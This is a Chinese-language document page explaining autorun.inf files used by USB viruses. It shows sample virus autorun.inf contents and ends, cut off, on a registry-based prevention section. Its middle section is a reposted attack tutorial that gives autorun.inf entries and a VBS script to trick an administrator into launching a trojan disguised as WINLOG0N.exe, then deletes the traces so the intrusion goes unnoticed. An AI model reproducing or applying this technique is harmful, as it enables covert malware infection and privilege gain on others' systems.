autorun.inf详解.docVIP

首先是autorun.inf一般的病毒的Autorun.inf文件内容为[autorun]open=.\RECYCLER\RECYCLER\autorun.exeshell\1=Openshell\1\Command=.\RECYCLER\RECYCLER\autorun.exeshell\2\=Browsershell\2\Command=.\RECYCLER\RECYCLER\autorun.exe shellexecute=.\RECYCLER\RECYCLER\autorun.exe它的效果是当双击打开盘时.会运行RECYCLER\RECYCLER\autorun.exe文件,用右键打开,会显示Open,Browser.还有一种是[autorun]OPEN=SVCH0ST.EXEshell\open=打开(O)shell\open\Command=SVCH0ST.EXEshell\open\Default=1shell\explore=资源管理器(X)shell\explore\Command=SVCH0ST.EXE对于这种U盘病毒，无论右键选择“打开”还是“资源管理器”病毒都会运行。一种利用autorun.inf提权的方法（转）以前看过很多关于AutoRun.inf的利用文章,网上全是千篇一律,互相模仿.我再来添点东西吧~ 还是先简单说下原理吧.写一个AutoRun.inf文件,放在对方某一盘符下,当管理员双击此盘时,就会执行AutoRun.inf指定的文件了.一般用在入侵 时没有运行权限时,欺骗管理员帮你运行.. 以前我在网上看到的都是一个模式 [AutoRun] open = 你想运行的程序 先不说这样运行是不是成功的,稍微想一下,就知道有问题,人家管理员不是傻子,这样双击是打不开盘符的,人家肯定知道出问题了,所以你玩不 长的.. 事实上那个文件在我机子是运行不起的,网上也没找到解决办法,相信还有很多人和我遇到过同样的问题,求人不如求已,自己搞定吧. 也不难,只要这样写就OK了: [AutoRun]open=AutoRun.exeshellexecute=AutoRun.exeshell\Auto\command=AutoRun.exe 这样,你把它保存为一个.inf文件,放在C盘下,AutoRun.exe为你指定的运行程序.这样双击C盘就可以成功运行了.前面还说过一个问题,就是C盘 打不开,很容易就被管理员发现了,有待改进.下来就说怎么解决这个问题,GO ON! 其实这个实现起来也不难,先把AutoRun.inf上传至对方C盘,我们可以做一个自解压包,也放在C盘根目录下,让他成为我们的指定运行文件,里面 包含我们要运行的程序,比如木马,还一个VBS脚本,自解压包执行后先让他执行VBS脚本,内容如下: set yu=wscript.createobject(wscript.shell)yu.run cmd /c start WINLOG0N.exe,0yu.run cmd /c del AutoRun.inf,0yu.run cmd /c start c:\,0yu.run cmd /c del AutoRun.vbs,0 我再简单解释下,解压后VBS帮我们运行winlogon.exe(我配置好的木马),然后删掉AutoRun.inf,为什么要删掉它,第一,减少被发现的机会,二,删 掉它,管理员重启机子或注销后如果右键点击盘复符不会出现播放,一切恢复中马前的状态,当然之前我们的木马已经运行了.第四行代码: 我 们为他打开C盘,最后再删掉vbs脚本自身. 这样改进后个人觉得安全性大大提高了.呵呵..各位在测试的时候只须把上面脚本中的 WINLOG0N.exe改为自己的木马就可以了.winxp sp2下测 试成功。防治方法其实这个文件不是病毒。也是用来打开病毒了。防治它的思路有两种：一是禁用自动播放，二是删除它，三是阻止它生成。1。在Windows系统有允许和阻止自动运行的键值的方法： 　　 在注册表中找到如下键： 键路径：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer] 在右侧窗格中有 NoDriveTypeAutoRun这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示: 设备名称 第几位 值 设备用如下数值表示 设备名称含义DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器DRIVE_REMOVABLE 2 1 04h 可